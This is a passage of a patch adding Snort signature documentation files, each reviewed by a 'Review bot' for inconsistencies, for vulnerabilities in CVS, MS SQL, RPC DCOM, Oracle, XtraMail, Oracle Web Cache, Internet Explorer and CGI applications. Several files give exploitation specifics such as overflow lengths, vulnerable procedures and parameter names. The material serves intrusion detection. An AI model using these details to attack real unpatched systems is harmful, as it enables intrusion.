+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 datagrams with undefined ICMP Codes are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
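Review bot: Impact and Detailed Information contradict each other. Impact states that an undefined code in a Parameter Problem message "is normally an indication of nefarious activity occurring on the network", while Detailed Information says it "could be an indication of routing problems on the network, or malfunctioning routing hardware" and Attack Scenarios is "None known"; settle on one characterisation and say which code values the rule treats as undefined, so an analyst knows whether to start with the sending router's configuration or with an investigation. Typo in the Summary: "generates and ICMP Parameter Problem datagram" should read "an ICMP". The file also lacks the "Affected Systems:" section present in the other signature docs.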
--- /dev/null
+++ b/doc/signatures/2317.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2317
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Concurrent Versions System (CVS).
+
+--
+Impact:
+Serious. Manipulation of the host file system is possible.
+
+--
+Detailed Information:
+Concurrent Versions System (CVS) is used to track the history of source
+code files when developing software.
+
+Some versions of CVS contain a vulnerability that may allow an attacker
+to create directories or files in the host filesystem external to the
+cvsroot. This is achieved via a malformed module request.
+
+--
+Affected Systems:
+	CVS versions prior to 1.11.10
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted request to a cvs server and
+create files and directories of their choosing in the hosts root
+filesystem. The attacker may then access these files at will to further
+compromise the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If compression is being used in data communications between the CVS
+server and clients, this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
+
+--
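Review bot: the scope of the filesystem write is described inconsistently. Detailed Information says files or directories can be created "external to the cvsroot", whereas Attack Scenarios says "in the hosts root filesystem"; the first is the accurate description of a path traversal out of the repository root, so the scenario should be aligned with it (and "hosts" should be "host's"). The False Negatives note about compressed client/server traffic is a good addition; it is worth adding that CVS sessions tunnelled over ssh are encrypted and will likewise not be visible to this rule, so the corrective action (patch or upgrade) is the only reliable control.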
--- /dev/null
+++ b/doc/signatures/1759.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+1759
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp
+
+--
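Review bot: the third paragraph of Detailed Information ("This connection can either be a legitimate telnet connection or the result of spawning a remote shell...") looks copied from a telnet signature and has no bearing on a command sent to a SQL server; drop it or replace it with a statement of which command the rule matches. Attack Scenarios currently reads "Simple. These are SQL database commands.", which is Ease of Attack text rather than a scenario; describe the actual abuse, for example an attacker who has obtained a database login issuing the command to act with the server's privileges. The MSDN reference points at the xp_* extended stored procedure documentation, so the Summary should name the procedure the rule keys on; without it the analyst cannot tell a dangerous call from routine administration, which is exactly the distinction the False Positives entry asks them to make. Corrective Action is missing a full stop after "investigate the server for signs of compromise".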
--- /dev/null
+++ b/doc/signatures/3434.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3434
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
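Review bot: "Expoit code exists." in Ease of Attack is a typo for "Exploit". Additional References is empty even though Corrective Action tells the reader to apply the vendor patch; the Microsoft security bulletin for the RPC DCOM issue should be cited so the patch can be located. The body is identical to the 3285.txt entry in this patch, so nothing tells an analyst what distinguishes SID 3434 from SID 3285 (which RPC interface, transport or port each one watches); add that to the Summary or Detailed Information. The port filter in Corrective Action ("RPC ports 135, 139 and 445 for both TCP and UDP ... from external sources") should be presented as a perimeter mitigation that does not protect against an attacker already inside the network, with the patch as the actual fix.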
--- /dev/null
+++ b/doc/signatures/2637.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2637
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
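Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is Snort configuration advice rather than a description of the vulnerability, and it sits in Detailed Information while the False Negatives section is empty; move it there and state the reason (presumably the rule keys on $ORACLE_PORTS and Oracle on Windows is often not on the default listener port, so the rule would otherwise never see the traffic). Also, "a Oracle database implementation" in the Summary should be "an Oracle", and Attack Scenarios names the "gname" parameter while Detailed Information only says "a parameter for the procedure"; the two should agree so the analyst knows what to look for in the captured request.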
--- /dev/null
+++ b/doc/signatures/2690.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2690
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure enable_propagation_to_dblink
+. This procedure is included in
+sys.dbms_defer_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
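Review bot: the procedure name in Detailed Information is split across lines with the full stop on its own line ("vulnerability in the procedure enable_propagation_to_dblink" / "."), which renders as a broken sentence; join it as "...the procedure enable_propagation_to_dblink. This procedure is included in sys.dbms_defer_repcat." Affected Systems has the duplicated word "Oracle Oracle9i". Additional References is empty although the only corrective action is the vendor patch, so the Oracle alert or advisory for this package should be cited. The False Negatives entry says "None Known", but the same port caveat given in 2637.txt of this patch (Oracle on Windows not on the default port, $ORACLE_PORTS) applies here too. Corrective Action is missing its full stop.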
--- /dev/null
+++ b/doc/signatures/3124.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3124
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
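Review bot: Affected Systems lists "Microsoft Windows Server 2000", which is not a product name; it should read "Microsoft Windows 2000 Server", and the list should state the service pack levels affected if known. Additional References is empty while Corrective Action depends on the vendor patch, so the Microsoft security bulletin should be cited. Attack Scenarios says the attacker supplies "extra data in the message ... containing code of their choosing" but never says how the message reaches the service; stating the transport the rule inspects (if it is the service's named pipe over SMB, say so) tells the analyst which traffic to pull for confirmation and lets them add a False Negatives note for encrypted or signed SMB sessions where the payload is not visible.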
--- /dev/null
+++ b/doc/signatures/1636.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+
+1636
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in Xtramail.
+
+--
+Impact:
+An attacker can execute an arbitrary command with the privilege of the user running Xtramail, typically root.
+
+--
+Detailed Information:
+Xtramail is a Mail Transfer Agent ,normally listening on port 110 and 25. Older versions have a buffer overflow in the remote service when it is issued the large input strings in the Username field.
+
+There are several unchecked buffers in XtraMail 1.11, which when overflowed will crash the server and cause a denial of service.
+
+--
+Affected Systems:
+
+	Artisoft XtraMail v1.11
+
+--
+Attack Scenarios:
+The POP3 server buffer can be overflowed by sending more than 1500 characters to the PASS argument.
+
+The SMTP server buffer can be overflowed by sending more than 10,000 charcters in the HELO argument.
+
+The username buffer for remote administration can be overflowed by sending more than 10,000 characters.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Certain types of binary file attachments could generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches
+
+Upgrade to the latest non-affected version of the software. 
+
+Block incoming attachments with .bat, .exe, .pif, and .scr extensions 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+http://www.securityfocus.com/bid/791
+
+--
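Review bot: the sections do not describe the same issue. Summary and Detailed Information place the overflow in the "Username field", but Attack Scenarios lists three different overflows (POP3 PASS over 1500 characters, SMTP HELO over 10,000, and the remote-administration username over 10,000) without saying which one SID 1636 matches; state the one this rule covers. The False Positives entry ("Certain types of binary file attachments could generate an event") and the Corrective Action line "Block incoming attachments with .bat, .exe, .pif, and .scr extensions" belong to a mail-attachment signature, not a protocol buffer overflow, and should be removed. Impact says the privilege gained is "typically root", yet the affected product is Artisoft XtraMail, a Windows NT mail server; verify this and change it to the service account if so. Typos: "Mail Transfer Agent ,normally" (misplaced comma) and "charcters".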
--- /dev/null
+++ b/doc/signatures/3448.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3448
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
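Review bot: Summary and Detailed Information both say the rule "does not generate an event" and is "used in conjunction with other rules", but neither says how (presumably it sets a flowbit with noalert) nor which rules depend on it; that dependency is the one thing worth documenting here, because an administrator who disables this rule as noise will silently break every rule that consumes its state. Typos in both paragraphs: "postives" and "occuring". Impact "Unknown." should be something like "None; this rule only records state for other rules", consistent with the "NA" entries in the rest of the file.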
--- /dev/null
+++ b/doc/signatures/2553.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2553
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
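Review bot: Detailed Information is inconsistent about what overflows. The first sentence blames "poor checking of the length of an HTTP Header", the second says "a large invalid HTTP Request Method", and Attack Scenarios gives "an HTTP Request Method of more than 432 bytes"; the method is part of the request line, not a header, so settle on the method throughout (the 432-byte figure supports that reading). The version strings in Affected Systems contain stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3", "9.0.2 .2", "9.0.3 .1") and should be "9.0.4.0", "2.0.0.4", "9.0.2.3" and so on. The False Negatives note about ports 7777 and 7778 is useful; name the port variable the rule uses so the reader knows what to change. Additional References is empty though the fix is a vendor patch, and Corrective Action lacks a full stop.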
--- /dev/null
+++ b/doc/signatures/3461.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3461
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer
+using the Content-Type parameter.
+
+--
+Impact:
+Serious. Code execution is possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle Content-Type or
+Content-Encoding headers returned from a server. It is possible to
+overflow a static buffer in urlmon.dll by supplying more than 300 bytes
+of data in the parameter for those headers.
+
+Specifically the error occurs when an image tag <img> is used to pass
+the excess data to both those header fields in a server response. Since
+some email clients use Internet Explorer to process HTML email messages,
+it is also possible to cause this overflow to occur via email.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker can supply a malicious HTML file to a mail client containing
+excess data in the Content-Type and Content-Encoding headers that will
+overflow the buffer presenting them with the opportunity to write to
+various parts of memory and possibly execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
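Review bot: the Summary ("overflow a buffer using the Content-Type parameter") does not name the affected software; Internet Explorer's urlmon.dll only appears in Detailed Information, and Affected Systems says merely "Microsoft Windows systems". Name Internet Explorer (and the versions, if known) in both, and make clear that this is a client-side rule that fires on a server response, which determines where the sensor must sit to see it. Corrective Action "Upgrade to the latest non-affected version of the software" should be "apply the vendor patch" for an Internet Explorer component. Detailed Information says the overflow needs more than 300 bytes "in the parameter for those headers" while Attack Scenarios says "excess data in the Content-Type and Content-Encoding headers"; use one phrasing. "Additional References" is missing its colon.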
--- /dev/null
+++ b/doc/signatures/901.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+901
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
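Review bot: the text is the generic CGI template and never says which script or URI SID 901 matches, so an analyst reading the event has nothing concrete to check on the web server; add the script name to the Summary and Detailed Information. Impact and Detailed Information describe both credential-validation weaknesses and arbitrary code execution for a rule that, as written, could be anything from a probe for a known-vulnerable script to an exploit attempt; say which it is. Typo in Detailed Information: "running ona web server". Additional References is empty.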
--- /dev/null
+++ b/doc/signatures/1483.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1483
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
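Review bot: the body is the same generic CGI template as 901.txt and does not identify the script SID 1483 keys on, so the analyst cannot confirm whether the targeted CGI is even installed on the server; add the script or URI to the Summary. Impact ("Possible execution of arbitrary code of the attackers choosing in some cases") should be narrowed to what the specific script allows, and "attackers" should be "attacker's". Typo in Detailed Information: "running ona web server". Additional References is empty.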
--- /dev/null
+++ b/doc/signatures/2866.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2866
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1195.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1195
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
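Review bot: the text is the same generic CGI template used for 901.txt and 1483.txt and never says which script SID 1195 matches, so three different rules in this patch are documented identically; add the script name to the Summary and Detailed Information so an analyst can tell the events apart. Impact and Detailed Information cover both credential-validation weaknesses and arbitrary code execution without saying which applies to this script. Typo in Detailed Information: "running ona web server". Additional References is empty.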
--- /dev/null
+++ b/doc/signatures/1069.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
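Review bot: the only reference, "NGS Whitepaper - Advanced SQL Injection", has no connection to anything in the body: neither the Summary nor Detailed Information mentions SQL injection. Either state that the rule matches a SQL injection attempt against a web application (and say what it keys on) or move the reference to the file that needs it. The URL also lacks the "http://" scheme every other reference in this patch uses. Detailed Information ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") is the generic web-server template and does not identify the web server or application SID 1069 covers.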
--- /dev/null
+++ b/doc/signatures/100000827.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000827
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "email" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
